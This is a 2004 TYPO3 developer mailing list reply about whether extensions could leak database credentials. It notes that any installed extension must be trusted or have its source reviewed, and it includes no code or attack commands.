[Typo3-dev] defined vars
Martin Seebach
typo3lists at g-bach.dk
Wed Oct 20 20:28:43 CEST 2004
Hi,
Daniel Gercke wrote:
> I think this is a security hole (typo3 v. 3.6.2).
> If i think about it, i could write an extension which is used by many
> people, and it can mail me some database accounts.
Password or no password, you could still put some code in you extension
that checks for a given GET variable, and executes that as SQL or a
shell command or PHP code. All of which is really bad - and much more
evil, because a default setup of MySQL will not accept incoming
connections over the network.
What is true for all software, is also true for TYPO3 extensions: When a
program is installed and executed, you have to trust the developer to
behave - or spend some time reading sourcecode. Which is much easier
with opensource, as Wolfgang Klinger also points out.
Venlig hilsen
Martin Seebach
More information about the TYPO3-dev
mailing list